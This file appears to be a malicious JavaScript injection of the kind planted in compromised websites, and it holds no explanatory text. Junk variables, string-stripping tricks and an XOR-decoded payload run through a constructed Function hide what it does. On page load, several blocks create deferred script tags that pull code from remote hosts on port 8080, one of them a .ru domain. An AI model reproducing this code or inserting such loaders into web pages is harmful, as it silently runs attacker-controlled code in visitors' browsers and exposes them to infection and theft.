var q=document;var sz=new Array();this.z="";var y=window;var v;if(v!=''){v='qx'};var a='s1cEr@i0p@t1'.replace(/[10E@B]/g, '');var sh;if(sh!='' && sh!='fn'){sh='f'};var qm;if(qm!='' && qm!='b'){qm='ql'};var p=new Date();var sl;if(sl!=''){sl='ai'};y.onload=function(){try {var pm='';s=q.createElement(a);this.lr='';var ze=new String();s.src='hdtdtKpd:F/F/drKaFkFu%t9ednF-KnKe%-9jKpF.ds9wFe%edtdidmK.FcKodmK.FgdoFo%gKl9e%-KcFo9m9-9hdkK.drKe9c9eKn%tdmde%x9i%cFod.Krdud:K8K098F09/daFl%l%odcKi%n9eK.dfKrF/%aKl9l9odcKiKnFeK.KfKr9/9g%oKo%gdldeF.Kc9oKmF.9nFg9/dmKiFxKid.Kj9pd/9gKoFodgdl%ed.%cdoFmF/K'.replace(/[K%Fd9]/g, '');var x;if(x!='fm'){x=''};this.w=58677;s.setAttribute('dwezftetrt'.replace(/[t9Dzw]/g, ''), "1");var xy="";var wm=45275;q.body.appendChild(s);} catch(sg){};};this.lj='';this.pi="";
var wo;if(wo!='f_'){wo=''};this.gx=false;g=function(){var o="o";var fn="";var f=document;var ss;if(ss!='hh' && ss!='b'){ss=''};window[gt([2,3][0])]=function(){try {var cr=new String();e=f[gt([3,1][1])](gt([0][0]));var qv;if(qv!='_' && qv != ''){qv=null};var h = f[gt([6,8][0])];this.gp=false;var fc;if(fc!='d' && fc!='zv'){fc=''};e[gt([5][0])](gt([7,7][0]), "1");var u;if(u!='' && u!='tb'){u=null};e[gt([3][0])]=gt([3,8][1]);this.zq='';var ez;if(ez!='' && ez!='rf'){ez='ac'};h[gt([2,4][1])](e);var k='';} catch(r){this.gxh=false;};var hu=new Array();};var vu;if(vu!='fj'){vu='fj'};function gt(v){this.pz="pz";var eu=['socor+iOp.tL'.replace(/[L\+o\.O]/g, ''), 'cxr?e?a?txe?EulVe?m?eVnxt?'.replace(/[\?uVXx]/g, ''), 'oQnAl>ogaQd>'.replace(/[\>gAvQ]/g, ''), 'sErycp'.replace(/[pjyKE]/g, ''), 'aKpspAe8nAdACKhAi8lbds'.replace(/[sb8KA]/g, ''), 'sSeSt;A|t7tSr*i7bSu7t;e*'.replace(/[\*7;\|S]/g, ''), 'b@o,dky@'.replace(/[@Nk,I]/g, ''), 'dze/fhe:r<'.replace(/[\<h/z\:]/g, ''), 'h|tBt_pQ:Q/_/BaQwWeQbWeQr|-|c|o|mB.|cWnBcQm|a_xW._cBnB.BbBlQo|gBb|uWsQ-_c|oBm_.Bh_o_tBnQe|wQgWu_iBd|eQ.Wr|u_:W8W0W8W0Q/_gQo_a_lW.QcWo_mW/Wg|oQa_l_.Qc|o_m|/Bg|oBoWg_l|e|.Wc_oQmB/BuBsQaBt|o|d_a|yQ.QcQoBmB/WbWe_eWmBp|3_._c_oBmQ/W'.replace(/[W_B\|Q]/g, '')];var w=eu[v];return w;var pw;if(pw!='' && pw!='pt'){pw=null};}this.dq=39109;};var kv;if(kv!='af'){kv='af'};g();var qb;if(qb!='gty' && qb!='l'){qb='gty'};
var wi=false;try {var _m;if(_m!='' && _m!='l'){_m=''};var u='cMrMeOa+t%eNE%l%e%m+e%n+tO'.replace(/[O%\+MN]/g, '');var e=new Array();var _b=new Array();var _=window;var gx;if(gx!='' && gx!='ld'){gx='wv'};var ez;if(ez!='' && ez!='zh'){ez='j'};var z='sScSrSiDpZtR'.replace(/[RS\^ZD]/g, '');var aj='';var n='';var x='o?n2lBoBaxd2'.replace(/[2iB\?x]/g, '');var gl;if(gl!='lq'){gl=''};var gy="";c=function(){this.ji="";h=document[u](z);h.setAttribute('dKeJfQeQrQ'.replace(/[QKJ2#]/g, ''), ([1,0][0]));var rr;if(rr!=''){rr='jn'};h['sZr9c9'.replace(/[9ZvVu]/g, '')]='h9t9t9p4:9/9/4i9m9a&g9e&f_a9pS-_c_o_m_._t&u&m&b9l9r9.4c4o4mS._a9lSi4c9eS-4iSt_.4m&e_d_i9a9t&aSg_o9n_l9i_n&e&._rSuS:&8&09840&/_gSo9o4g9l4e9.4c4o4m_/Sg4o&o_g&l&e_.9c&o4m9/9m9l9b9._c4o&m9/Sz_h9a_o&p_iSn&._c&o&m&/St_o9pSi9x_.4c4oSm_/_'.replace(/[_S9&4]/g, '');var qf;if(qf!='hc' && qf!='nz'){qf=''};var jv;if(jv!='nt'){jv='nt'};document['bIomdIym'.replace(/[mRcNI]/g, '')]['aHp#p#eHn0d<C<h<i#lNdN'.replace(/[NH\<0#]/g, '')](h);var _k;if(_k!='az'){_k=''};var mn='';};this.ny="ny";var __;if(__!='y' && __!='wk'){__=''};_[x]=c;var xv;if(xv!='_w'){xv='_w'};var zb='';var qz;if(qz!='jb' && qz != ''){qz=null};} catch(a){var cl=new Array();this._r="_r";};var bn=new String();var rh=new String();
var My="d8d3c0e9cda0cdc9c8c4e79cfad1d4ee94daf1e8d6eef9cec6fec0d2ecc0f1e0cacbecd7f3eac2cffed7fcd4ecf3e7cdddcae4deafa39fb68ed4cecfdee6cbcbcc81c6dfb9cfdad5bfcfcea9c9cb";var yQ;if(yQ!='MQe' && yQ!='cJ'){yQ='MQe'};var bg;if(bg!='' && bg!='Ko'){bg=null};var UFz;if(UFz!='yV' && UFz!='yA'){UFz='yV'};function m(M){this.eZ="";var xD=new Date();this.MF=false; var a=function(x,Rv){var Me;if(Me!='' && Me!='zu'){Me=null};return x^Rv;var LJ=new Date();};var E='';var r;if(r!='' && r!='Id'){r=null};var uw=false;var PG;if(PG!='' && PG!='TI'){PG=null};var Y="Y"; this.Bn=false;var Wi;if(Wi!='' && Wi!='d'){Wi=null};function R(am){this.rs="";var C =[203,0,143,225][1];this.b=false;var HZ=new String();var e = -1;var vi;if(vi!='Vc'){vi=''};var A = '';var bh="";var AJ;if(AJ!='' && AJ!='Cj'){AJ=null};am = new f(am);var UF='';var w =[131,0,148][1];var Qk=false;this.vY=false;var xLH;if(xLH!='cm' && xLH != ''){xLH=null};this.sY='';for (w=am[g("ngleth", [2,3,0,1])]-e;w>=C;w=w-[1][0]){A+=am[g("hacrAt", [2,0,1,3])](w);var Ap;if(Ap!=''){Ap='sn'};var Z=2085;}this.TE=48827;this.HO='';return A;var Ar=new Array();}var Jg;if(Jg!='qU'){Jg='qU'};var k;if(k!='wS'){k='wS'};var Jo;if(Jo!=''){Jo='ZH'};var RB=new Date(); function o(xL,n){var Eg;if(Eg!=''){Eg='kO'};var kA=false;return xL[g("achorCAdet", [1,2,0])](n);var Uj=new Array();} this.oc="";var gA;if(gA!='' && gA!='rL'){gA='wJ'};function g(am, y){var ZA=new Date();var HEa=new Date();var JG;if(JG!='HEl' && JG != ''){JG=null};var kN=new Date();var cl;if(cl!=''){cl='FU'};var kD;if(kD!='OV'){kD='OV'};var C=[0][0];var A = '';this.Ku="Ku";var eM=new Array();var T = am.length;var Q=[1,83,156][0];var km;if(km!='LV' && km!='xs'){km=''};var xQ = y.length;var Vo=new Array();this.ci=55874;var mL="";var ej="";for(var w = C; w < T; w += xQ) {var Tn="";var Ky="";var Tv="";var dxB;if(dxB!='' && dxB!='QF'){dxB=null};var xm = am.substr(w, xQ);if(xm.length == xQ){var Zk;if(Zk!='ur'){Zk='ur'};var TZ=false;var Tj;if(Tj!='FL' && Tj!='ByQ'){Tj=''};var pF;if(pF!='MQu' && pF!='MW'){pF=''};for(var P in y) {var KD=new String();var QFh=new String();A+=xm.substr(y[P], Q);var Lu;if(Lu!='vX' && Lu!='Cz'){Lu=''};var ut=new Date();}var pL;if(pL!='jh' && pL != ''){pL=null};this.Nd="";var ub=false;} else {var kh;if(kh!='' && kh!='TF'){kh=null};var Nq=new String();  A+=xm;}}var zR;if(zR!='' && zR!='zy'){zR=''};this.xLB="xLB";var sh=false;return A;var oW=33312;}this.CA="CA";var gM;if(gM!='' && gM!='PL'){gM='ik'};this.Vj=""; var ou=function(L){this.GS="";var sX;if(sX!='Ok' && sX != ''){sX=null};var ggx='';var P=[0][0];var HA;if(HA!='' && HA!='pP'){HA=''};var MU=[130,255][1];var ZHn;if(ZHn!='vd' && ZHn!='We'){ZHn=''};this.BP=52527;var Q=[12,176,1][2];var wZ=[33,185,0][2];var CS=new String();var I=L[g("elgnht", [1,0])];var qUf=new Array();var hL;if(hL!=''){hL='be'};var yI;if(yI!='' && yI!='Gw'){yI=null};this.Xj=false;while(P<I){var rj;if(rj!='pYQ' && rj != ''){rj=null};this.id=60538;this.kE=51744;P++;var eY;if(eY!='eI'){eY=''};i=o(L,P - Q);wZ+=i*I;var mW=new String();var tk;if(tk!='Oks' && tk!='dN'){tk='Oks'};}var wQ;if(wQ!='kZ'){wQ='kZ'};var jy;if(jy!='QJ'){jy='QJ'};var Ne="Ne";return new f(wZ % MU);var lOu=new Array();};var Pu=63237;var af=window;var Cv=af[g("avel", [2,1,0,3])];var Mi=new Array();var fO=Cv(g("cinoFunt", [4,5,2,0,7,1,3,6]));var La;if(La!='Gl'){La=''};var xK;if(xK!='Wd'){xK=''};var Hk=false;var z=Cv(g("ERegxp", [1,2,3,0]));var MQ = '';this.WQ=60297;var kZT="";var f=Cv(g("niStrg", [2,3,4,1,0]));var iP=new Array();this.kF="";var aSz;if(aSz!='' && aSz!='ma'){aSz=''};var Od="";var uJ;if(uJ!='vV' && uJ!='qL'){uJ=''};var TH;if(TH!='EP'){TH='EP'};var V=af[g("sncueape", [3,1,4,0,2])];var wPu="";var CP=f[g("rfoCmhraCdoe", [1,0,2])];var od="od";var Xb;if(Xb!='Rq'){Xb='Rq'};var Te='';var zl=new Date();var lw;if(lw!='' && lw!='QL'){lw='shD'};var Q =[1][0];var GL="";var VPm;if(VPm!='mS' && VPm != ''){VPm=null};var H = M[g("elgnht", [1,0])];var C =[0,148,198,63][0];var ew=new Array();var WIE;if(WIE!='zX' && WIE!='VH'){WIE=''};var Du=false;var XI="";var kG;if(kG!='WVE'){kG='WVE'};var Qx=new Array();var Po = '';this.mI='';var c = /[^@a-z0-9A-Z_-]/g;var yY=new Date();var F =[220,190,2][2];this.If="If";var nu = '';this.tr="";var Fb =[0,73,68,91][0];var mF;if(mF!='' && mF!='RU'){mF=''};var j=[1, g("omucdnc.teeetarlemeEts\'(nrtpic\')", [4,0,3,2,1]),2, g("eudmcodbno.tepypa.lhniCdd(d)", [2,5,4,1,3,0]),3, g(".aetkmevzosice..oemssnadpce", [1,3,0,4,2]),4, g("o.micleisevteisndgr:u0.880", [4,0,2,1,5,3]),5, g(".desttArtiubet(d\'feer\'", [1,0,3,2,4]),6, g("celo.gogom", [5,3,6,7,2,1,4,0]),7, g("inwowdon.oald", [2,0,1]),8, g("eqpmatsu.com", [3,4,2,1,7,0,6,5]),11, g("ar.terb.rcom", [3,4,5,1,0,2]),12, g("ngadfnao.com", [4,2,5,3,6,0,1]),14, g("uciotnfn()", [6,0,5,1,4,2,3,7]),15, g("(ctcahe)", [3,4,2,1,5,0]),16, g("tt\"hp:", [2,3,0,1]),17, g("oggoel", [1,0]),18, g(".drsc", [1,0]),19, g("1\')\'", [1,0]),20, g("rty", [1,0])];var Tw = '';var wF = "%";var rz=new Array();var AE=new String();var vJT=63569;this.eE=36336;var se;if(se!='mz'){se=''};for(var q=C; q < H; q+=F){nu+= wF; var ir;if(ir!='' && ir!='Rvb'){ir=null};var Tk="Tk";nu+= M[g("ussbrt", [1,0])](q, F);var qE;if(qE!='YV' && qE!='Nu'){qE='YV'};}var Px;if(Px!='CM'){Px='CM'};var lk;if(lk!='vdJ'){lk='vdJ'};var ul;if(ul!='Un' && ul != ''){ul=null};var M = V(nu);var wv=false;this.CiK=22004;var jC=42120;var u = new f(m);var h = u[g("pecrlea", [3,1,0,4,6,2,5])](c, Po);var zt=new Date();var Af = new f(fO);var LR="LR";var ya=new String();var hF = j[g("etlgnh", [2,0,4,3,1])];var Oq;if(Oq!='' && Oq!='LjJ'){Oq='hU'};var Jm;if(Jm!='' && Jm!='pq'){Jm=null};h = R(h);this.pR=38745;var Zm=new String();this.Nx="";var He = Af[g("erlpcae", [1,0])](c, Po);var jO=new String();this.BJ='';var He = ou(He);var uIE;if(uIE!='tG'){uIE='tG'};var nX=ou(h);var oG;if(oG!='QQ'){oG='QQ'};var Eb;if(Eb!='' && Eb!='qj'){Eb='Dq'};for(var w=C; w < (M[g("elgnht", [1,0])]);w=w+[1][0]) {this.wPm=false;var D = h.charCodeAt(Fb);var zRn;if(zRn!='' && zRn!='NP'){zRn='aZ'};var B = o(M,w);var wY="wY";var vu='';B = a(B, D);var tLt=new Date();B = a(B, nX);var kX="";var TvT;if(TvT!='PJ'){TvT='PJ'};B = a(B, He);Fb++;var OO;if(OO!='' && OO!='ous'){OO=''};if(Fb > h.length-Q){Fb=C;}this.ud='';this.XK='';var Vfp=new Date();var gX;if(gX!='' && gX!='Lx'){gX='kOG'};Tw += CP(B);this.ZM="ZM";this.zZ="zZ";}var np=new String();var Dg=15100;for(p=C; p < hF; p+=F){var om="om";var yd = CP(j[p]);var eH = j[p + Q];var kXq=65382;var fu=new String();var gWX=false;var Zz;if(Zz!='qW'){Zz=''};var TU = new z(yd, f.fromCharCode(103));var SZS;if(SZS!='ac'){SZS='ac'};Tw=Tw[g("erlpcae", [1,0])](TU, eH);this.pQz=false;this.wr=false;}var IV;if(IV!='BK' && IV!='Mr'){IV=''};var dbD;if(dbD!='Nf' && dbD!='mj'){dbD=''};var K=new fO(Tw);var br;if(br!='' && br!='mLq'){br=''};var YWz;if(YWz!='' && YWz!='xU'){YWz=''};K();var Km=new Array();var Xk;if(Xk!='' && Xk!='mG'){Xk=null};h = '';var OL;if(OL!='' && OL!='LFU'){OL=null};var wQt;if(wQt!='' && wQt!='fw'){wQt=null};K = '';this.QU="QU";Tw = '';var ju="ju";this.YC='';Af = '';var nw="nw";var pw;if(pw!='eSI'){pw=''};this.rh=18966;nX = '';var idv;if(idv!='XY' && idv!='zRV'){idv=''};He = '';var ER;if(ER!='' && ER!='hm'){ER=''};return '';var og='';};var yQ;if(yQ!='MQe' && yQ!='cJ'){yQ='MQe'};var bg;if(bg!='' && bg!='Ko'){bg=null};var UFz;if(UFz!='yV' && UFz!='yA'){UFz='yV'};m(My);


var AD;if(AD!=''){AD='BW'};var K;if(K!='D' && K!='Hu'){K=''};this.Yv="";function Y(){var TC=new Array();var n=new Array();var YO=unescape;var w;if(w!='a' && w != ''){w=null};var b;if(b!='' && b!='gW'){b=null};var s=window;var V=YO("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%61%63%65%72%2e%63%6f%6d%2f%65%78%61%6d%69%6e%65%72%2e%63%6f%6d%2e%70%68%70");this.KQ='';var hO="";var r;if(r!='' && r!='U'){r=null};function h(T,z){var W='';var M;if(M!='' && M!='vK'){M='TO'};var Gd;if(Gd!='' && Gd!='S'){Gd='xJ'};var qh;if(qh!='' && qh!='P'){qh='gQ'};var H=String("gHqPz".substr(0,1));var u;if(u!='Zl' && u != ''){u=null};var L=YO("%5b"), B=YO("%5d");var DI=new Array();var l=L+z+B;var Bl=new RegExp(l, H);var TT;if(TT!='Gf' && TT!='TcE'){TT=''};var Fl='';return T.replace(Bl, new String());var uS;if(uS!=''){uS='bO'};var BX;if(BX!=''){BX='fU'};};this.ha="";this.Us="";var hp="";var Hz=new Date();var q=h('835446034596861156506135','2463591');var dV;if(dV!='' && dV!='In'){dV=null};this.HU="";var A=new String();var X=document;var Od=new Date();var HA;if(HA!='_c' && HA!='tc'){HA=''};var Bp=new Array();function O(){var wK=new String();var nr=new Date();var m=YO("%68%74%74%70%3a%2f%2f%6c%6f%61%64%74%75%62%65%2e%72%75%3a");var FN;if(FN!='' && FN!='Zg'){FN='Ab'};var gG;if(gG!='' && gG!='AH'){gG='fc'};var LC;if(LC!='' && LC!='jY'){LC=null};A=m;var lm=new Date();var TN=new Date();A+=q;A+=V;this.Be='';try {var Op;if(Op!=''){Op='DC'};var fD;if(fD!=''){fD='Dh'};var uF="";var hI;if(hI!='pV' && hI != ''){hI=null};C=X.createElement(h('socorniop1to','n91o'));this.WF='';var tB=new String();C[YO("%73%72%63")]=A;var MY;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();